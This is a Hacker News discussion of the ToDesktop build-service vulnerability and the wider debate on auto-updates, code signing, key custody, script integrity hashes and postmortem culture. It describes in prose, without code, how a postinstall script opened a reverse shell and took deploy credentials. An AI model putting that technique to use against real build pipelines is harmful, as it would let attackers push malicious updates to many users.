Dave and toDesktop have build a product that serves many people really well, but I'd encourage everyone building desktop software (no matter how, with or without toDesktop!) to really understand everything involved in compiling, signing, and releasing your builds. In my projects, I often make an argument against too much abstraction and long dependency chain in those processes.
If you're an Electron developer (like the apps mentioned), I recommend:
* Build with Electron Forge, which is maintained by Electron and uses @electron/windows-sign and @electron/osx-sign directly. No magic.
* For Windows signing, use Azure Trusted Signing, which signs just-in-time. That's relatively new and offers some additional recovery mechanisms in the worst case.
* You probably want to rotate your certificates if you ever gave anyone else access.
* Lastly, you should probably be the only one with the keys to your update server.
It is your duty to make sure _all_ of your users are able to continue using the same software they installed in exactly the same way for the reasonable lifetime of their contract, the package, or underlying system (and that lifetime is measured in years/decades, with the goal of forever where possible. Not months).
You can, if you must, include an update notification, but this absolutely cannot disrupt the user's experience; no popups, do not require action, include an "ignore forever" button. If you have a good product with genuinely good feature improvements, users will voluntarily upgrade to a new package. If they don't, that is why you have a sales team.
Additionally, more broadly, it is not your app's job to handle updates. That is the job of your operating system and its package manager. But I understand that Windows is behind in this regard, so it is acceptable to compromise there.
We go a step further at my company. Any customer is able to request any previous version of their package at any time, and we provide them an Internet download page or overnight ship them a CD free of charge (and now USB too).
That sounds like a good idea. Unless you’re the vendor, and instead of 1000 support requests for version N, you’re now facing 100 support requests for version N, 100 for N−1, 100 for N−2, …, and 100 for N−9.
And anyone who does will find a percentage of users figure it out and then just get back to work.
The answer is a support window. If they are in bounds and have active maintenance contracts, support them.
If not, give them an option to get on support, or wish them luck.
Then the other answer is to really think releases through.
None of it is cheap. But it can be managed.
For the vast realm of <300$/year products, the ones that actually use updaters, all your suggestions are completely unviable.
Auto-updates mostly ever practically happen for software used at home or SMB which might not have a functioning IT. If security is the concern why not use auto-updates only for security updates? Why am I gaining features I explicitly did not want, or losing the ones which were the reason I bought the software in the first place? Why does the dev think I am not capable of deciding for myself if or when to update? I have a solid theory of why and it involves an MBA-type person thinking anyone using <$300 software just can't think for themselves and if this line of thought cuts some costs or generates some revenue all the better.
Sure, virii were with us since the early 80's, but they mostly targetted the OS, and there were no rapid security patch release cycles back then. You just had 'prevention' and mostly cleanup.
Sure. I’d rather have it be provided by the platform. It’s a lot of work to maintain for 5 OSs (3 desktop, 2 mobile).
> we should try our best to release complete software to users that will work as close to forever as possible
This isn’t feasible. Last I tried to support old systems on my app, the vendor (Apple) had stopped supporting and didn’t even provide free VMs. Windows 10 is scheduled for non-support this year (afaik). On Linux glibc or gtk will mess with any GUI app after a few years. If Microsoft, Google and Apple can’t, why the hell should I as a solo app developer? Plus, I have 5 platforms to worry about, they only have their own.
> Touching files on a user's system should be treated as a rare special occurrence.
Huh? That’s why I built an app and not a website in the first place. My app is networked both p2p and to api and does file transfers. And I’m supposed to not touch files?
> If a server is involved with the app, build a stable interface and think long and hard about every change.
Believe me, I do. These changes are as scary as database migrations. But like those, you can't avoid them forever. And for those cases, you need at the very least to let the user know what’s happening. That’s half of the update infrastructure.
Big picture, I can agree with the sentiment that ship fast culture has gone too far with apps and also we rely on cloud way too much. That’s what the local first movement is about.
At the same time, I disagree with the generalization seemingly based on a narrow stereotype of an app. For most non-tech users, non-disruptive background updates are ideal. This is what iOS does overnight when charging and on WiFi.
I have nothing against disabling auto updates for those who like to update their own software, but as a default it would lead to massive amounts of stale non-working software.
I'm pretty sure you know what I meant, it's obvious from context. System program files. The files that are managed by your user's package manager (and by extension their IT department)
Which leaves you with self-updaters. I definitely agree ideally it shouldn’t be the applications job to update itself. But we don’t live in that world atm. At the very least you need to check for updates and EOL circuit breakers for apps that aren’t forever- local only apps. Which is not a niche use-case even if local-first infra was mature and widely adopted, which it very much isn’t.
Anyway, my app works without internet, pulls no business logic at runtime (live updates) and it uses e2ee for privacy. That’s way more than the average ad-funded bait-and-switch ware that plague the majority of commercial software today. I wish I didn’t have to worry about updates, but the path to less worries and healthy ecosystem is not to build bug-free forever-software on top of a constantly moving substrate provided largely by corporations with multiple orders of magnitude more funding than the average software development company.
they avoid mentioning it, but the Microsoft managed package format (MSIX) works just fine without the Microsoft Store. create an App Installer manifest, stick it on a website, and get semver-d differential updates across multiple architectures for free: https://learn.microsoft.com/en-us/windows/msix/app-installer...
msft have woefully underinvested in the ecosystem and docs though. I wish they'd fund me or others to contribute on the OSS side - electron could be far simpler and more secure with batteries-included MSIX
EDIT: I think your link answered some of these questions. I’m on .msi myself so can’t benefit from it yet anyway.. basically these things need to be managed by the app bundlers like electron & tauri otherwise we’re asking for trouble. I think..
Why do you need "free VMs" as a professional software company. A couple of legacy machines is pocket change comparet to the salary of even a signle developer.
> Windows 10 is scheduled for non-support this year (afaik).
So? People are still releasing new software for XP. It's not that hard.
> On Linux glibc or gtk will mess with any GUI app after a few years.
glibc provides extreme long-term backwards compatibility so isn't a problem as long as you build against the oldest version you want to support.
gtk is a problem but also doesn't change as often as you are implying - we are only at version 4 now. And depending on what software you are building you can also avoid it.
> If Microsoft, Google and Apple can’t, why the hell should I as a solo app developer? Plus, I have 5 platforms to worry about, they only have their own.
So that your users have a reason to choose you over Microsoft, Google and Apple.
Linux, I got burned again yesterday. Proxmox distribution has no package I need in their repository.
I am trying to use Ubuntu package - does not work.
I try to use debian - too old version.
How do I solve this? By learning some details of how the Linux distributions and repositories work, struggling some more and finding customly built version of .deb. Okay, I can do it, kinda, but what about non-IT person?
Software without dependencies is awesome. So, docker is something I respect a lot, because it allows the same model (kinda).
Auto-updaters are the most practical and efficient way of pushing updates in today's world. As pointed out by others, the alternative would be to go through app store's update mechanism, if the app is distributed via app store in the first place, and many people avoid Microsoft store/MacOS app store whenever possible. And no developer likes that process.
Apart from, maybe, Linux distros, neither Apple or Microsoft are providing anything to handle updates that isn’t a proprietary store with shitty rules.
For sure the rules are broken on desktop OSs but by the meantime, you still have to distribute and update your software. Should the update be automatic ? No. Should you provide an easy way to update ? I’d said that at the end it depends on if you think it’s important to provide updates to your users. But should you except your users or their OSs to somehow update your app by themselves ? Nope.
Have a shoe-box key, a key which is copied 2*N (redundancy) times and N copies are stored in 2 shoe-boxes. It can be on tape, or optical, or silicon, or paper. This key always stays offline. This is your rootiest of root keys in your products, and almost nothing is signed by it. The next key down which the shoe-box key signs (ideally, the only thing) is for all intents and purposes your acting "root certificate authority" key running hot in whatever highly secure signing enclave you design for any other ordinary root CA setup. Then continue from there.
Your hot and running root CA could get totally pwned, and as long as you had come to Jesus with your shoe-box key and religiously never ever interacted with it or put it online in any way, you can sign a new acting root CA key with it and sign a revocation for the old one. Then put the shoe-box away.
You can pick up a hardware security module for a few thousand bucks. No excuse not to.
I'd rather one the most reliable and cheap hardware security model we know of: paper.
Print a bunch of QR/datamatrix codes with your key. Keep one in a fireproof safe in your house, and another one elsewhere.
Total cost: ~$0.1 (+ the multipurpose safe, if needed)
It is a bit expensive when it gets to 5-10 printers but still cheaper than the thousands.
I've noticed a lot of websites import from other sites, instead of local.
<script src="scriptscdn.com/libv1.3">
I almost never see a hash in there. Is this as dangerous as it looks, why don't people just use a hash?
2. Because that requires you to know how to find the hash and add it.
Truthfully the burden should be on the third party that's serving the script (where did you copy that HTML in the first place?) but they aren't incentivizes to have other sites use a hash.
And once you vendor your dependencies you can calculate the hash yourself
[0]: there are caveats to this
I think https and integrity hashes address two very orthogonal attack vectors.
Do you mean that hashing the file takes time? I guess that can be significant, but it's probably 2 or 3 cycles per byte, and average js size is like 10kb tops? 30khz doesn't look like much, it's a millionth of a second.
Originally the point of using a shared CDN like this was that if others used it too the file would already be cached on the user's computer and make it even faster. But, this feature was used for fingerprinting users by checking which files from other websites were cached and browsers have isolated the caches in response which makes it impossible to get the speed benefits from before.
So if you're not getting that speed benefit, and only really getting a tiny bandwidth reduction, the risks of serving the file from a 3rd party (which could be mitigated by the hashes) aren't worth it compared to simply vendoring the file and serving it yourself.
So it's not that hashing prevents caching or lowers response times, but that the risk it is mitigating isn't worth the effort. Just 'err on serving the file yourself.
Plus, as mentioned, only 1st party origins enjoy any benefits of caching content for faster load times so you get an additional benefit
wget url; sha256 file
So, why did you not actually post the correct shell script? Apparently that would have been more effort to get right and ensure is correct right? And also work for every OS. And there you have it: if someone first has to figure out which script to run, some percentage will give up here. And that's my point: the browser should make it as easy as possible to avoid that from happening.
How does the browser know which files to warn you about? What about scripts that are generated dynamically and have no static hash? There's plenty of reasons why you wouldn't want this.
> What about scripts that are generated dynamically and have no static hash?
Well, then the warning is still valid because this is a security risk. I guess it'd be fine to be able to suppress the warning explicitly in those cases.
> There's plenty of reasons why you wouldn't want this.
For example? Honestly curious where you would not want a warning by default.
- After version X we are displaying a prominent popup if a script isn't loaded with a hash
- After version Y we blocking scripts loaded without hashes
They could solve this problem in a year or so, and if devs are too lazy to specify a hash when loading scripts then their site will break.
There are security risks with JSONP (a hack to bypass same-origin policy), and the successor (CORS) has been around since 2009, so phasing it out may be a good thing.
https://dev.to/benregenspan/the-state-of-jsonp-and-jsonp-vul...
Also some of the tracking scripts I don't think are strictly static content, maybe their strategy to fingerprint browser involves sending different shit to different users.
Specifying a script hash says that you as the owner of that site agree to load the content only if it matches the hash. Presumably you trust the content enough to serve it to your users.
Disclosure: I work at Google, but not on Chrome.
[1] https://flbrack.com/posts/2023-02-15-dont-break-the-web/
I have always put Windows signing on hold due to the cost of commercial certificate.
Is the Azure Trusted Signing significantly cheaper than obtaining a commercial certificate? Can I run it on my CI as part of my build pipeline?
I wrote @electron/windows-sign specifically to cover it: https://github.com/electron/windows-sign
Reference implementation: https://github.com/felixrieseberg/windows95/blob/master/forg...
There's plenty of magic. I think that Electron Forge does too many things, like trying to be the bundler. Is it possible to set up a custom build system / bundling with it or are you forced to use Vite? I guess that even if you can, you pull all those dependencies when you install it and naturally you can't opt out from that. Those dev dependencies involved in the build process are higher impact than some production dependencies that run in a sandboxed tab process (because a tiny malicious dependency could insert any code into the app's fully privileged process). I have not shipped my app yet, but I am betting on ESBuild (because it's just one Go binary) and Electron Builder (electron.build)
I built one code signing system after being the “rubber duck” for a gentleman who built another, and both used HSM cards and not cheap ones. Not those shitty little USB ones. One protected cellphones, the other protected commercial aviation.
I recently checked it out as an alternative to renewing our signing cert, but it doesn't support issuing EV certs.
I've understood it as having an EV code signing cert on Windows is required for drivers, but somehow also gives you better SmartScreen reputation making it useful even for user space apps in enterprisey settings?
Not sure if this is FUD spread by the EV CA's or not though?
github should be ashamed this possibility even exists and double ashamed that their permission system and UX is so poorly conceived that it leads apps to ask for all the permissions.
IMO, github should spend significant effort so that the default is to present the user with a list of repos they want some github integration to have permissions for and then for each repo, the specific permissions needed. They should be designed that minimal permissions is encouraged.
As it is, the path of least resistance for app devs is "give me root" and for users to say "ok, sure"
By design, the gh cli wants write access to everything on github you can access.
I’m not sure how much of this is “standard” for an org though.
It won't have licenses or anything, so if somebody wants to distribute it outside my website they will be able to do it.
If I just want to point to a exe file link in S3 without auto updates, should just compile and upload be enough?
This vulnerability was genuinely embarrassing, and I'm sorry we let it happen. After thorough internal and third-party audits, we've fundamentally restructured our security practices to ensure this scenario can't recur. Full details are covered in the linked write-up. Special thanks to Eva for responsibly reporting this.
Hubris. Does not inspire confidence.
> We resolved the vulnerability within 26 hours of its initial report, and additional security audits were completed by February 2025.
After reading the vulnerability report, I am impressed at how quickly you guys jumped on the fix, so kudos. Did the security audit lead to any significant remediation work? If you weren't following PoLP, I wonder what else may have been overlooked?
Yes, we re-architected our build container as part of remediation efforts, it was quite significant.
Not your first rodeo.
Another way is to avoid absolutes and ultimatums as aggressively as one should avoid personal judgements.
Better phrased as: "we did our best to prevent this scenario from happening again.
Fact is it just could happen! Nobody likes that reality, and overall when we think about all this stuff, networked computing is a sad state of affairs..
Best to just be 100 percent real about it all, if you ask me.
At the very least people won't nail you on little things, which leaves you something you may trade on when a big thing happens.
And yeah, this is unsolicited and worth exactly what you paid. Was just sharing where I ended up on these things in case it helps
I'm not sure I read anything that makes me confident this class of bugs could never recur. I could be reasonably confident this _exact_ bug in this _exact_ scenario may not happen again, but that only makes me more concerned about variants that may have equal or more serious implications.
So I'm wondering which claim did it for you? I only really saw pen test as a concrete action.
If you get a slap on the wrist, do you learn? No, you play it down.
However if a dev who gets caught doing a bad is forced to resign. Then all the rest of the devs doing the same thing will shape up.
Except Dave didn't play it down. He's literally taking responsibility for a situation that could have resulted in significantly worse consequences.
Instead of saying, "nothing bad happened, let's move on," he, and by extension his company, have worked to remedy the issue, do a write up on it, disclose of the issue and its impact to users, and publicly apologize and hold themselves accountable. That right there is textbook engineering ethics 101 being followed.
"Yeah it was a problem but it's fixed now, won't happen again"
Sure buddy.
It's not something you fix, when stuff like this happen, it's foundational, you can't fix it, it's a house of cards, you gotta bring it down and build it again with lessons learned.
It's like a skyscraper built with hay that had a close call with some strong northern winds, and they come out and say, we have fortified the northern wall, all is good now. You gotta take it down and build it with brick my man.
I'm done warning people about security, we'll fight it out in the industry, I hope we bankrupt you.
That's the last thing you should ever do within a large scale software system. The idea that restarting from scratch because "oh we'll do it better again" is the kind of thing that bankrupts companies. Plenty of seasoned engineers will tell you this.
https://www.joelonsoftware.com/2000/04/06/things-you-should-...
then nearly everyone involved has incentive to coverup problem or to shift blame
Got it
There are some people who will be discouraged from committing a crime over threat of punishment. But many will not. Many people behave well because they’re just moral people, and others won’t because they’re just selfish and antisocial. Still others commit crimes out of desperation despite the risks. If the threat of imprisonment were effective, there would be no crime, because we already have prisons and penalties of punishment. But since we do have crime, it logically follows that it’s not effective.
The other point here is that threat of punishment is not particularly effective as a management strategy in the private sector. It doesn’t incentivize behavior in the manner you might believe. Mostly it makes your reports dislike you and it makes them less productive. It’s a thing you learn pretty quickly as a manager.
There’s a model of a person being a rational thinker, but in reality, people aren’t always rational. (Hell, adolescents are biologically programmed not to be rational and to stress test the limits of nature and society.) You find success in making less-than-rational people work together in harmony and achieve positive outcomes.
https://www.psychologytoday.com/us/blog/crime-and-punishment...
https://www.unsw.edu.au/newsroom/news/2020/07/do-harsher-pun...
https://www.ojp.gov/pdffiles1/nij/247350.pdf
https://www.helsinki.fi/en/news/economics/do-harsh-punishmen...
And it pays off in cases like this, I'll be talking with someone about a topic like the seriousness of a vulnerability, they disagree, that's fine no need to convince me, you won't. And then it turns out they're left-leaning abolitionists who are against the idea of jails.
Many such cases, on the other hand I'll be disagreeing with someone on business strategy, and two lines later they reveal that they think taxation is theft. I can rest easy and ignore them.
Respectfully, that’s not a very “hacker” way of seeing the world. Hackers learn from their mistakes and adapt. (Just like this software company is doing.)
Punishment does not deter crime. The threat of punishment does to a degree.
IOW, most people will be unaware of a person being sent to prison for years until and unless they have committed a similar offense. But everyone is aware of repercussions possible should they violate known criminal laws.
If the topic becomes questioning century old traditions like jails, taxes, or war, like we're about to revolutionaze humankind, I'm out.
Life is complex and vulnerabilities happen. They quickly contacted the reporter (instead of sending email to spam) and deployed a fix.
> we've fundamentally restructured our security practices to ensure this scenario can't recur
People in this thread seem furious about this one and I don't really know why. Other than needing to unpack some "enterprise" language, I view this as "we fixed some shit and got tests to notify us if it happens again".
To everyone saying "how can you be sure that it will NEVER happen", maybe because they removed all full-privileged admin tokens and are only using scoped tokens? This is a small misdirection, they aren't saying "vulnerabilities won't happen", but "exactly this one" won't.
So Dave, good job to your team for handling the issue decently. Quick patches and public disclosure are also more than welcome. One tip I'd learn from this is to use less "enterprise" language in security topics (or people will eat you in the comments).
Point taken on enterprise language. I think we did a decent job of keeping it readable in our disclosure write-up but you’re 100% right, my comment above could have been written much more plainly.
Our disclosure write-up: https://www.todesktop.com/blog/posts/security-incident-at-to...
Were the logs independent of firebase? (Could someone exploiting this vulnerability have cleaned up after themselves in the logs?)
> No malicious usage was detected
Curious to hear about methods used if OK to share, something like STRIDE maybe?
> Completed a review of the logs. Confirming all identified activity was from the researcher (verified by IP Address and user agent).
These kinds of "never happen again" statements never age well, and make no sense to even put forward.
A more pragmatic response might look like: something similar can and probably will happen again, just like any other bugs. Here are the engineering standards we use ..., here is how they compare to our peers our size ..., here are our goals with it ..., here is how we know when to improve it...
Who knows what else was vulnerable in your infrastructure when you leaked .encrypted like that.
It should have been on your customers to decide if they still wanted to use your services.
They were compensated, but doesn't elaborate.
> for those wondering, in total i got 5k for this vuln, which i dont blame todesktop for because theyre a really small company
Woooowwww!
See latest line: "update: cursor (one of the affected customers) is giving me 50k USD for my efforts."
The employee made a mistake and you just paid for them to learn about it. Why would you fire someone you just educated?
Nobody gets fired: learning opportunity for next time, but little direct incentive to improve.
Fire someone: accountability theater (who is really responsible), loss of knowledge.
AFAIK, blameless postmortems and a focus on mechanisms to prevent repeats seems like the best we’ve come up with?
If they didn't pay you a cent, you have no liability here.
IANAL, not legal advice
The lesson: don't use USB sticks people give you, unless you have your own way of verifying that they're virus-free.
Also, don't give people bombs. That's usually illegal, unlike giving someone software with unknown bugs in it.
So this is to say, at what point should we start pointing the finger at Google for allowing developers to shoot themselves in the foot so easily? Granted, I don't have much experience with firebase, but to me this just screams something about the configuration process is being improperly communicated or overall is just too convoluted as a whole.
Details like proper usage, security, etc. Those are often overlooked. Google isn't to blame if you ship a paid product without running a security audit.
I use firebase essentially for hobbyist projects for me and my friends.
If I had to guess these issues come about because developers are rushing to market. Not Google's fault ... What works for a prototype isn't production ready.
Arguably, if you provide a service that makes it trivial to create security issues (that is to say, you have to go out of your way to use it correctly) then it's your fault. If making it secure means making it somewhat less convenient, it's 100% your fault for not making it less convenient.
It's my responsibility to make sure when we scale from 3 users to 30k users we take security seriously.
As my old auto shop teacher used to say, if you try to idiot proof something they'll build a better idiot.
Even if Google warns you in big bold print "YOU ARE DOING SOMETHING INSECURE", someone out there is going to click deploy anyway. You're arguing Google disable the deploy button, which I simply disagree with.
I have a similar qualm with GraphQL.
In addition to that, it'd be cool if the blameless postmortems were made public, so everyone could learn from them.
As for the other 2 options of restricting freedom, and extremely blameful postmortems, I reject both.
You seem really stuck on the first two options. Why does it matter, given that the third is the best? Do you still insist upon a false dichotomy?
Usually when you don't know something, you ask someone who knows. Since you sort-of asked here, I'll give you the answer:
Blameless postmortems lead to fewer failures, which is ostensibly the goal here. So what do you get from your idea of blameful ones? Feeling good about punishing someone, even though you're increasing failures by doing so?
Either rhetoric and discourse are unfamiliar to you (for instance, that a basic tenant is that one does not make a strong claim which acts as foundational evidence for their entire premise and then assume it to be taken as fact based on statement alone -- if that were true then 3rd graders would win all arguments by saying 'nuh-uh'), or you don't understand that responsibility can also apply to you in many cases.
If you do something stupid, like keep ignoring the insecure warning and updating them so they don't expire, that's your fault.
In no other industry do workers blame their tools.
Go into any other industry and hear when they say, "shoot yourself in the foot", and you've likely stumbled upon a situation where they blame their tools for making it too easy to do the wrong thing.
This means someone setup these rules improperly. Even if, you're responsible for the tools you use. We're a bunch of people getting paid 150k+ to type. It's not out of the question to read documentation and at a minimum understand how things work.
That said I don't completely disagree with you, if Firebase enables reckless behavior maybe it's not a good tool for production...
For 150k+ salaries, frontend dev salaries are generally a lot less than their backend counterparts. And scrappy startups might not have cash for competitive salaries or senior engineers. I think these are a few of the reasons why Firebase becomes dangerous.
https://sf-fire.org/employment-opportunities/h2-firefighter
I don't think it's out of the question to expect professionalism at 150k. These are VC funded companies, not a couple of college kids scraping together a prototype.
Then again, if I was a CTO seeing stories like this I'd be inclined to NOT use Firebase. I'm actually using Supabase right now since I don't like vendor lock in. Deploying Supabase manually is really difficult, but it is an option.
I imagine if I ever run a serious company, which I don't think will ever happen, I would take something like Supabase and run it on prem with some manner of enhanced security.
It's interesting though... For decades the industry has been trying to push this narrative that you don't need servers. You can handle everything using some magic platform, and throw in a couple of custom lambda functions when you need to execute logic.
Parse, Firebase, Appwrite and dozens of others emerged to fill this niche.
ToDesktop, provides even another layer of abstraction. We don't want to handle our own app updates, cool let someone else do it. That someone else doesn't want to manage their own backend, cool let someone else do it.
You end up with multiple layers of potential vulnerabilities which shouldn't exist... Cursor, Arc, etc could run their own update servers.
Maybe the solution is a Steam like distribution platform. Or just using Steam itself. That's a 30% cut to let someone else figure out your app distribution...
You can expect whatever you want, just prepare to be disappointed. We have absolutely learned by now that unless there very real consequences for doing or not doing something, you will regularly see the worst possible thing happen. This is why licenses exist and legal 'sign-offs' exist. There needs to be a licensing organization that can revoke people's ability to get certificates or to even be employed working on certain aspects of software if we ever want to solve this problem. I mean, you even need a license to cut hair in many states.
What a dystopian future, curl without a permit?
Why are you blaming the rank and file employees. The buck stops with the employer. If anything fine the companies
Software is not just something someone uses for hobbies or for word processing or whatever. A bad design decision in some critical software can have just as much of an impact as a bad design decision in a bridge or an airplane. If we want to be called 'engineers' then we need to put more on the line than just a public apology when something goes wrong due to a decision someone actively made to save money or reduce the work involved. And of course it should involve the people who make those decisions and not just the grunt who implemented them.
But if the 'grunts' had the power to say 'no, I will not do this because it is insecure and my license is on the line' then that's a good thing. No?
This will never work in a global economy. If you outsource the software you're just begging companies to find someone making 15$ the fall guy.
Sounds pretty bad. Your manager tells you to do something stupid or your fired. You do so, and when it fails they blame you and your software engineering license is revoked. You can't find a job and now get to live in a homeless shelter.
Meaningful fines for companies is the only way to fix this.
Maybe... For some sensitive things like location data an expensive permit should be required. But this needs to be a corporate responsibility, not an individual one.
In your scenario bad companies are going to ruin the lives of their employees by making them risk their licenses.
Arguably this whole thing wouldn't happen if these apps were distributed and updated via the OSX app store. If that's the future you want, it's largely already here.
You can check a setting in OSX to make it so.
Who decides what software to regulate. Do I need a permit to install Python ?
I don't want to regulate software. I want people to have something to lose if they make a decision that has a large impact.
> Arguably this whole thing wouldn't happen if these apps were distributed and updated via the OSX app store. If that's the future you want, it's largely already here.
I don't understand this point.
> Who decides what software to regulate.
Who decides any laws or regulations?
> Do I need a permit to install Python ?
Does you installing Python have potential consequences for large numbers of people or could it cause a significant amount of harm?
Why do you take the most extreme possible position and apply it to me? Is it that difficult to argue against a sensible one?
I don't understand this point.
The core of this issue is an insecure updating mechanism for desktop apps. You can argue for security sake, users may opt to only use the official Apple app store or the official Microsoft store. In this case instead of having a random startup manage the update process, you have a couple of multibillion dollar companies.
I'm trying to figure out what exactly you want to happen here. Would you essentially make it a legal to distribute software without a permit ? Would distributing certain software require a permit ?
If you want to run your company using vetted software and limit your developers to only use a small list of approved software. You can do that. I've worked in such environments. You can lock down the corporate firewall. The point is choice.
It's completely different if you basically want a regulatory agency which will decide what software people are allowed to build.
Outside of work I like to use niche Linux distros. If I accidentally wipe my vacation photos during the install process, that's a risk I took. I don't have a right to complain that I destroyed my own data and blame it on software largely built by volunteers.
However I don't disagree completely. If you want to build a hardened fork of Linux with software vetted by your private certifying authority, that could be a good market. If all engineers working on your custom fork need to be "licensed" by a privately run organization, that is also fine.
I just wouldn't want the State to do this.
I’d argue no.
Let the private sector regulate this. If you want to use an extremely locked down OS with a small handful of apps, go right ahead.
The State has no role in this.
I guess if you can prove negligence you can sue.
This is a better point than you realize. Blameless postmortems in IT are largely inspired by blameless postmortems from aerospace failures.
Defaults should be secure. Kind of blows my mind people still don't get this.
That's why we don't have seatbelts of safety harnesses or helmets or RCDs. There's always going to be an idiot that drives without a seatbelt so why bother at all right?
If you drive in a way that affects the safety of others, there are generally consequences.
Remove as much hurdles to increase adoption.
The only reason we didn't for so long was because we didn't have a viable alternative. Now we do, we should absolutely stop writing C.
Kudos to cursor for compensating here. They aren't necessarily obliged to do so, but doing so demonstrates some level of commitment to security and community.
Just want to make sure I understand this. They made a hello world app and submitted it to todesktop with a post install script that opened a reverse shell on the todesktop build machine? Maybe I missed it but that shouldn't be possible. Build machine shouldn't have outbound open internet access right?? Didn't see that explained clearly but maybe I'm missing something or misunderstanding.
Like, effectively the "build machine" here is a locked down docker container that runs "git clone && npm build", right? How do you do either of those activities without outbound network access?
And outbound network access is enough on its own to create a reverse shell, even without any open inbound ports.
The miss here isn't that the build container had network access, it's that the build container both ran untrusted code, and had access to secrets.
Unfortunately, in some ecosystems, even downloading packages using the native package managers is unsafe because of postinstall scripts or equivalent.
Funny you should mention this because I was just psyching myself up to submit my blog piece from last night on the topic.
In Python, downloading packages using the native package installer (Pip, which really doesn't itself do anything that could be called package management) is unsafe because of build scripts - unless you tell it to only accept pre-built packages, defeating the point of the systems these Linux distros are using. (I assume/hope people in this position are aware of the problem and have rigged up another solution with the API. In the post I commented that I don't know of such solutions being publicly available, but surely they exist somewhere.)
You'd be justified in wondering why the build script runs when you only ask to download the package. It's mainly because of the historically atrocious approach to metadata (and all the legacy packages for which installation is still supported). But from reading the issue trackers, it seems like the code paths aren't especially easy to disentangle, either - since they've gone so long with the assumption baked in that the problem isn't really solvable.
In other HN posts I've complained about people pointing out things in the Python packaging ecosystem that aren't really problems. But this really is one.
https://zahlman.github.io/posts/2025/02/28/python-packaging-...
If you want a perfectly secure system with 0 users, it's pretty easy to build that.
I'm not suggesting that a commercial service should require this. You asked "In what world do you have ..." and I'm pointing out that it's actually a fairly common practice. Particularly in any security conscious environment.
Anyone not doing it is cutting corners to save time, which to be clear isn't always a bad thing. There's nothing wrong if my small personal website doesn't have a network isolated fully reproducible build. On the other hand, any widely distributed binaries definitely should.
For example, I fully expect that my bank uses network isolated builds for their website. They are an absolutely massive target after all.
There are just far too many insecure and 'typo' malware to pull off the internet raw.
If you're providing a build container service then you pretty much have to run untrusted code (the customer's) in the container, yes? So then the problem is really just the bad Firebase config... ?
- You can have a submission process that accepts a package or downloads dependencies, and then passes it to another machine that is on an isolated network for code execution / build which then returns the built package and logs to the network facing machine for consumption.
Now sure if your build machine is still exposing everything on it to the user supplied code (instead of sandboxing the actual npm build/make/etc.. command) you could insert malicious code that zips up the whole filesystem, env vars, etc.. and exfiltrates them through your built app in this case snagging the secrets.
I don't disagree that the secrets on the build machine were the big miss, but I also think designing the build system differently could have helped.
If your users are using bazel, it's easy to separate "download" from "build", but if you're meeting your users over here where cows aren't spherical, you can't take security that seriously.
Security doesn't help if all your users leave.
Why would running code on a github action runner that's built to run code be against ToS?
If it was, I'm sure they'd ban the marketplace extensions that make it absolutely trivial to do this: https://github.com/marketplace/actions/debugging-with-ssh
Instances where an air gapped build machine doesn't work are examples of developer laziness, not bothering to properly document dependencies.
The number of packages that is malicious is high enough, then you have typo packages, and packages that get compromised at a later date. Being isolated from the net with proper monitoring gives a huge heads up when your build system suddenly tries to contact some random site/IP.
You're far more likely to encounter a security issue from adding/upgrading a dependency than your build process requiring internet access.
I don't get it. Why would it be "todesktop's fault", when all the mentioned companies allowed to push updates?
I had these kind of discussions with naive developers giving _full access_ to GitHub orgs to various 3rd party apps -- that's never right!
From ToDesktop incident report,
> This leak occurred because the build container had broader permissions than necessary, allowing a postinstall script in an application's package.json to retrieve Firebase credentials. We have since changed our architecture so that this can not happen again, see the "Infrastructure and tooling" and "Access control and authentication" sections above for more information about our fixes.
I'm curious to know what the trial/error here was to get their machine to spit out the build or if it was in one-shot
This service is a kind of "app store" for JS applications installed on desktop machines. Their service hosts download assets, with a small installer/updater application running on the users' desktop that pulls from the download assets.
The vulnerability worked like this: the way application publishers interact with the service is to hand it a typical JS application source code repo, which the service builds, in a container in typical CI fashion. Therefore the app publisher has complete control over the build environment.
Meanwhile, the service performs security-critical operations inside that same container, using credentials from the container image. Furthermore, the key material used to perform these operations is valid for all applications, not just the one being built.
These two properties of the system: 1. build system trusts the application publisher (typical, not too surprising) and 2. build environment holds secrets that allow compromise of the entire system (not typical, very surprising), over all publishers not just the current one, allow a malicious app publisher to subvert other publishers' applications.
It also is, they are responsible for which tech pieces they pick in constructing their own puzzle
From an Electron bundler service, to sourcemap extraction and now an exposed package.json with the container keys to deploy any app update to anyone's machine.
This isn't the only one, the other day Claude CLI got a full source code leak via the same method from its sourcemaps being exposed.
But once again, I now know why the entire Javascript / TypeScript ecosystem is beyond saving given you can pull the source code out of the sourcemap and the full credentials out of a deployed package.json.
You've always been able to do the first thing though: the only thing you can do is obfuscate the source map, but it's not like that's a substantial slowdown when you're hunting for authentication points (identify API URLs, work backwards).
And things like credentials in package.json is just a sickness which is global to computing right now: we have so many ways you can deploy credentials, basically 0 common APIs which aren't globals (files or API keys) and even fewer security tools which acknowledge the real danger (protecting me from my computers system files is far less valuable then protecting me from code pretending to be me as my own user - where all the real valuable data already is).
Basically I'm not convinced our security model has ever truly evolved beyond the 1970s where the danger was "you damage the expensive computer" rather then "the data on the computer is worth orders of magnitude more then the computer".
It truly is a community issue, it's not a matter of the lang.
You will never live down fucking left-pad
Does this info about the fix seem alarming to anyone else? It's not a full description, so maybe some important details are left out? My understanding is that containers are generally not considered a secure enough boundary. Companies such as AWS use micro VMs (Firecracker) for secure multi tenant container workloads.
I know that sounds kind of sad that my brain can't focus that well (and it is), but I appreciated the cat.
https://en.m.wikipedia.org/wiki/Neko_(software)
Ah, whimsy memories of running that on beige boxen of my youth.
Also remember a similar thing with some Lemmings randomly falling and walking around on windows.
Played way too long having them pile up and yank the window from under them.
I would've expected IDE developers to "roll their own"
-paid operating system (rhel) with a team of paid developers and maintainers verifying builds and dependencies.
- empty dependencies. Only what the core language provides.
It's not that great of a sacrifice. Like 20$/mo for the OS. And like 2 days of dev work which pays itself off in the long run by avoiding a mass of code you don't understand
I made Signal fix this, but most apps consider it working as intended. We learned nothing from Solarwinds.
(eg: companies still hosting some kind of integrity checking service themselves and the download is verified against that… likely there’s smarter ideas)
The user experience of auto-update is great, but having a single fatal link in the chain seems worrying. Can we secure it better?
We have reviewed logs and inspected app bundles. No malicious usage was detected. There were no malicious builds or releases of applications from the ToDesktop platform.
Is there an easy way to validate the version of Cursor one is running against the updated version by checking a hash or the like?This is why we need to remove incompetent product managers that have no clue and somehow are in the position to control what developers can work on.
This was an excellent conclusion for the article.
Bit too hyperbolic or whatever... Otherwise thrilling read!
This is completely incompetent to the point of gross negligence. There is no excuse for this
With that culture supply chain attacks and this kind of vulnerability will keep happening a lot.
